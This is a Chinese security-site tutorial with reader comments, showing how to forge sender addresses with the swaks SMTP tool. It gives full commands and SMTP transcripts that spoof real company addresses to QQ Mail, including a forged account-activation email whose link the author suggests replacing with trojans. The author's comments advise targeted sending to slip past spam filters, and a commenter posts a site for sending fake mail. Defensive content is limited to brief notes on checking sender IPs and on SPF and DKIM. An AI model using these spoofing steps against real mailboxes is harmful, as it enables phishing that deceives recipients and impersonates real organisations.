x5wg

x5wg
FB招聘站
分类阅读
专栏
公开课
FIT 2019
企业服务
用户服务
搜索
投稿
登录
注册
钓鱼邮件初探：黑客是如何进行邮件伪造的？ dontshoot2016-01-07现金奖励共1213670人围观，发现 31 个不明物体工具网络安全
本文原创作者：dontshoot

免责声明：本站提供安全工具、程序(方法)可能带有攻击性，仅供安全研究与教学之用，风险自负!

现如今的钓鱼邮件都是通过注册相似的邮箱，或者设置邮箱的显示名称，盼着被害人有看走眼的那一刻，轻信邮件的内容。这种方法需要一定的社工技巧，以及诱导性的语言来诱使被害人上钩。但是对于有一定的经验以及眼力的人来说，还是可以识破骗子的伎俩。

下面我要介绍的这款工具可以最大程度的欺骗你的邮箱，更不要提你的眼睛。当然，此方法不是适用于任何邮箱，毕竟每种邮箱的过滤机制都不相同。gmail在这方面就做的不错。

Swaks - SMTP界的瑞士军刀

安装：kali中自带，或者从作者网页下载

基本用法：

swaks –to <要测试的邮箱> 用来测试邮箱的连通性

root@kali:~# swaks --to xxxx@qq.com
=== Trying mx3.qq.com:25...
=== Connected to mx3.qq.com.
<- 220 newmx59.qq.com MX QQ Mail Server -> EHLO kali
<- 250-newmx59.qq.com <- 250-SIZE 73400320 <- 250-STARTTLS <- 250 OK -> MAIL FROM:
<- 250 Ok -> RCPT TO:
<- 250 Ok -> DATA
<- 354 End data with .
-> Date: Tue, 05 Jan 2016 23:15:11 -0500
-> To: xxxx@qq.com
-> From: root@kali
-> Subject: test Tue, 05 Jan 2016 23:15:11 -0500
-> X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
->
-> This is a test mailing
->
-> .
<** 550 Mail content denied. http://service.mail.qq.com/cgi-bin/help?subtype=1&&id=20022&&no=1000726 -> QUIT
<- 221 Bye === Connection closed with remote host. 前面都返回250ok，说明该邮箱存在，并且可以正常收信。最后可以看到qq邮箱返回550错误，qq官方给出的出错原因：该邮件内容涉嫌大量群发，并且被多数用户投诉为垃圾邮件。我们可以继续对邮件进行伪造，来绕过qq邮箱的判断比如： swaks --to xxxx@qq.com --from info@freebuf.com --ehlo freebuf.com --body hello --header "Subject: hello" 其中： –from <要显示的发件人邮箱>

–ehlo <伪造的邮件ehlo头>

–body <邮件正文>

–header <邮件头信息，subject为邮件标题>

root@kali:~# swaks --to xxxx@qq.com --from info@freebuf.com --ehlo freebuf.com --body hello --header "Subject: hello"
=== Trying mx3.qq.com:25...
=== Connected to mx3.qq.com.
<- 220 newmx.qq.com MX QQ Mail Server -> EHLO freebuf.com
<- 250-newmx.qq.com <- 250-SIZE 73400320 <- 250-STARTTLS <- 250 OK -> MAIL FROM:
<- 250 Ok -> RCPT TO:
<- 250 Ok -> DATA
<- 354 End data with .
-> Date: Tue, 05 Jan 2016 23:23:09 -0500
-> To: xxxx@qq.com
-> From: info@freebuf.com
-> Subject: hello
-> X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
->
-> hello
->
-> .
<- 250 Ok: queued as -> QUIT
<- 221 Bye === Connection closed with remote host. 在你ip没有被qq邮箱band的情况下，邮件可以正常发送，返回250 ok。到这一步基本上可以满足伪造邮件的要求了，但是qq邮箱会有安全提示，不过在不注意的情况下，基本上普通用户会轻信邮件中的内容。高级用法：使用swaks其实还可以进行更高级的邮件伪造，几乎可以伪造邮件中的每一个参数。 –data <源邮件>

首先，我们需要一份正常的邮件

点击显示邮件原文，把原文复制出来，保存为email.txt

其中的received可以都删除，该项为接收信息，发信中不需要。to项也可以删除，可以直接用swaks –to来代替。

注意不要忘了加–from 否则qq邮箱会报由kali代发……

swaks --data ./Desktop/email.txt --to xxxx@qq.com --from services@tophant.com
=== Trying mx3.qq.com:25...
=== Connected to mx3.qq.com.
<- 220 newmx.qq.com MX QQ Mail Server -> EHLO kali
<- 250-newmx.qq.com <- 250-SIZE 73400320 <- 250-STARTTLS <- 250 OK -> MAIL FROM:
<- 250 Ok -> RCPT TO:
<- 250 Ok -> DATA
<- 354 End data with .
-> X-QQ-mid: bizesmtp1t1452053499t679t108
-> X-QQ-SSF: A0100000002000F16x90000A0000000
-> X-QQ-FEAT: JN+C/NT9bLPRA1qtkTz2XI2YtLAH2K0SriLtB4o1q8I8MwPIq85lzXVAE4t7b
-> OaepuNhlRjNMuNhLJH2pbIQ3JkVf4MP4TXQi2HVPIG8N8dUf6GgxSJyMKya1U+CgOSvNgnP
-> bbplbVZjkAVzVuoZOc03UetuyeF1A3SpS70fm7O8nzDqx918Tpsf+n3dlMN6UaAEV3SJycL
-> 1JuHYi2/yTQ7J6XJ4bMhJRRbRROkDmpNEgqGw1Sfo66A/oJUz0rf4tLEr7HgNuls18LrqZV
-> jYfpcX5wglT4lxLNkHZRNBshk=
-> Date: Wed, 6 Jan 2016 12:11:39 +0800
-> Return-Path: services@tophant.com
-> From: =?utf-8?B?RnJlZUJ1Zi/mvI/mtJ7nm5LlrZDmnI3liqHlm6LpmJ8=?=
-> Subject: =?utf-8?B?RnJlZUJ1Zi/mvI/mtJ7nm5LlrZDotKbmiLfmv4DmtLvpgq7ku7Y=?=
-> Message-ID: <34db99d2b030c0f7b34bd2c6beca9666@account.tophant.com>
-> X-Priority: 3
-> X-Mailer: PHPMailer 5.1 (phpmailer.sourceforge.net)
-> MIME-Version: 1.0
-> Content-Type: multipart/alternative;
-> boundary="b1_34db99d2b030c0f7b34bd2c6beca9666"
->
->
-> --b1_34db99d2b030c0f7b34bd2c6beca9666
-> Content-Type: text/plain; charset = "utf-8"
-> Content-Transfer-Encoding: 8bit
->
-> FreeBuf/æ¼æ´žç›’åè´¦æˆ·æ¿€æ´»é‚®ä»¶
->
->
-> --b1_34db99d2b030c0f7b34bd2c6beca9666
-> Content-Type: text/html; charset = "utf-8"
-> Content-Transfer-Encoding: 8bit
->
-> 尊敬的FreeBuf/漏洞盒子用户：
-> 您好，您可以点击以下链接激活您的账号：
https://account.tophant.com/register/activation/token/c5023007b72363de7085504cf922d0c6伪造成功，你还敢点这条链接么

本邮件由系统自动发出，请勿回复。
->
-> 感谢您的使用。
-> FreeBuf/漏洞盒子管理团队
->
->
->
-> --b1_34db99d2b030c0f7b34bd2c6beca9666--
->
-> .
<- 250 Ok: queued as -> QUIT
<- 221 Bye === Connection closed with remote host. 发送成功，qq邮箱没报垃圾邮件，也没报有害。伪造成功，这超链接可以换成你喜欢的各种探针啊，马啊之类的，在加上一点社工技巧，在APT横行的年代，自求多福吧。解决办法：遇到可疑邮件要查看源邮件，判断发信人ip是否为可信任的ip。 * 作者：dontshoot，本文属FreeBuf原创奖励计划文章，未经许可禁止转载 dontshoot 1 篇文章等级： 1级 || 上一篇：教你构建自己的yara数据库下一篇：通过机器学习进行恶意软件分析：Deepviz中的聚类算法基本原理这些评论亮了河蟹回复 @ lucky0001 自己研究不够深，就特么の别逼逼！研究的深的真不会开口这么说，这个别说过163，谷歌邮箱没问题！连续发送所用的策略都特么不同！基于ip 发送频率发送内容发送标题得策略控制，别说是伪造。你正常邮件频率过大也会定义为垃圾邮件的！ )29(亮了 langyajiekou (6级)回复现在越来越多公司启用SPF和DKIM了，一般无效。 )10(亮了二号回复 @ lucky0001 装逼被喷的感觉是怎样的！啥都看不上眼，啥都没做过，you can you up .ok？ )6(亮了 __patient 回复膜拜别开枪 )7(亮了 KibodWapon (2级)回复原因是你用qq邮箱发的邮件，因为freebuf使用的是qq企业邮箱，所以成功发送，假设你用163的邮箱就发送失败。 root@kali:~/tools/bankshells# nslookup -type=txt tophant.com Server: 192.168.217.2 Address: 192.168.217.2#53 Non-authoritative answer: tophant.com text = "v=spf1 include:spf.mail.qq.com ~all" Authoritative answers can be found from: Non-authoritative answer: tophant.com text = "v=spf1 include:spf.mail.qq.com ~all" Authoritative answers can be found from: )7(亮了发表评论已有 31 条评论 __patient 2016-01-07回复 1楼膜拜别开枪亮了(7) Karunesh91 (7级) 2016-01-07回复 2楼别开枪牛逼亮了(4) KibodWapon (2级) 2016-01-07回复 3楼原因是你用qq邮箱发的邮件，因为freebuf使用的是qq企业邮箱，所以成功发送，假设你用163的邮箱就发送失败。 root@kali:~/tools/bankshells# nslookup -type=txt tophant.com Server: 192.168.217.2 Address: 192.168.217.2#53 Non-authoritative answer: tophant.com text = "v=spf1 include:spf.mail.qq.com ~all" Authoritative answers can be found from: Non-authoritative answer: tophant.com text = "v=spf1 include:spf.mail.qq.com ~all" Authoritative answers can be found from: 亮了(7) KibodWapon (2级) 2016-01-07回复 spf 记录和发件人伪造 http://www.renfei.org/blog/introduction-to-spf.html 亮了(6) 你大爷夫 2016-01-07回复 4楼马嘻嘻亮了(4) lucky0001 (5级) 已经买了电脑，网费已经续到了2020年。 2016-01-07回复 5楼你这个已经过时了，而且针对大型/多目标/的动作，根本是无效的，搞这个最忌讳用工具，一入库你就死了，这个策略几个大场子的现在都是活策略，你用这样的办法分分钟钟入 SPAM ，不信连发试试。亮了(5) 河蟹 2016-01-07回复 @ lucky0001 自己研究不够深，就特么の别逼逼！研究的深的真不会开口这么说，这个别说过163，谷歌邮箱没问题！连续发送所用的策略都特么不同！基于ip 发送频率发送内容发送标题得策略控制，别说是伪造。你正常邮件频率过大也会定义为垃圾邮件的！亮了(29) lucky0001 (5级) 已经买了电脑，网费已经续到了2020年。 2016-01-07回复 @ 河蟹你研究深，你研究生，革命小将放过我。亮了(4) 二号 2016-01-07回复 @ lucky0001 装逼被喷的感觉是怎样的！啥都看不上眼，啥都没做过，you can you up .ok？亮了(6) lucky0001 (5级) 已经买了电脑，网费已经续到了2020年。 2016-01-07回复 @ 二号红小将们我错了，我不该装逼，我研究浅，我不该乱说话亮了(5) langyajiekou (6级) 2016-01-07回复 6楼现在越来越多公司启用SPF和DKIM了，一般无效。亮了(10) KKK 2016-01-07回复 7楼看文章提供的图片,这怎么能叫邮件伪造呢? 要实现你截图这样随便搞个发邮件软件都行呀亮了(3) hela 2016-01-07回复 @ KKK 伪造发件人亮了(3) 小meet (1级) 2016-01-07回复 8楼屌，回头试试亮了(1) 小莨 (1级) 2016-01-07回复 9楼成功率看运气，有的成功有的不成功，这是为啥呢？亮了(1) dontshoot (1级) 2016-01-08回复 @ 小莨你得看返回的错误代码是什么，每个邮箱的判断机制都不一样亮了(1) 我这奇怪的脑洞 2016-01-07回复 10楼看评论区这么欢腾，咋第一时间脑子里蹦出了“天融信”这个词。亮了(2) Angus (5级) AMD®Zen.Team.com.org.cn.net/lo... 2016-01-07回复 11楼大神,我要拜你为师,学习黑客技术, 亮了(1) 奇怪的BUG 2016-01-07回复 12楼马克亮了(2) blackeagle (3级) 向FreeBuf致敬 2016-01-08回复 13楼说点实话你的姿势不是很好啊都会有举报垃圾邮件的提示亮了(4) dontshoot (1级) 2016-01-08回复 @ blackeagle 发多了一定会进垃圾箱的，并且ip都有被ban的风险，建议定点打击亮了(1) freebuffzck (4级) 2016-01-08回复 14楼测了下我们公司邮箱居然可以哦亮了(1) 守夜人社工库 2016-01-10回复 15楼我记得有个网址可以帮你发这种邮件亮了(1) freebuffzck (4级) 2016-01-11回复 @ 守夜人社工库 http://www.deadfake.com/Send.aspx 亮了(1) Jumbo (6级) 论坛https://www.chinabaiker.com 2016-01-12回复 16楼一直都提示500 亮了(1) hamapi (1级) 2016-01-22回复 17楼一直都是550啊。。。。亮了(1) jarow 2016-03-02回复 18楼邮箱不都是ip白名单机制吗，IP不对是不是直接进垃圾箱了亮了(1) zmsjs (1级) 2016-08-15回复 19楼求伪造QQ邮箱，发给QQ别名邮件亮了(0) ArthurKiller (7级) 窃.格瓦拉驻FreeBuf办事处 2016-08-15回复 @ zmsjs 都有SPF，别想了。。。。亮了(1) het亲爱的 2017-08-09回复 20楼现在很多IDC都封了25端口，根本发不出去啊。。我试了阿里，腾讯，GOOGLE，AWS都是。。亮了(0) Breaker (2级) 2017-11-21回复 21楼亲测有用亮了(0) 昵称请输入昵称必须您当前尚未登录。登陆？注册邮箱请输入邮箱地址必须（保密）表情插图有人回复时邮件通知我 dontshoot 这家伙太懒，还未填写个人描述！ 1 文章数 4 评论数最近文章钓鱼邮件初探：黑客是如何进行邮件伪造的？ 2016.01.07 浏览更多相关阅读邮件伪造技术与检测你造吗？恶意软件连老司机也骗了CNCERT钓鱼邮件攻击防范指南针对银行钓鱼事件的分析钓鱼邮件初探：黑客是如何进行邮件伪造的？特别推荐关注我们分享每日精选文章活动预告 11月 FreeBuf精品公开课·双11学习狂欢节 | 给努力的你打打气已结束 10月【16课时-连载中】挖掘CVE不是梦（系列课程2）已结束 10月【首节课仅需1元】挖掘CVE不是梦已结束 9月【已结束】自炼神兵之自动化批量刷SRC 已结束 FREEBUF免责声明协议条款关于我们加入我们广告及服务寻求报道广告合作联系我们友情链接关注我们官方微信新浪微博腾讯微博Twitter赞助商 Copyright © 2018 WWW.FREEBUF.COM All Rights Reserved 沪ICP备13033796号 css.php 正在加载中...0daybank

文章评论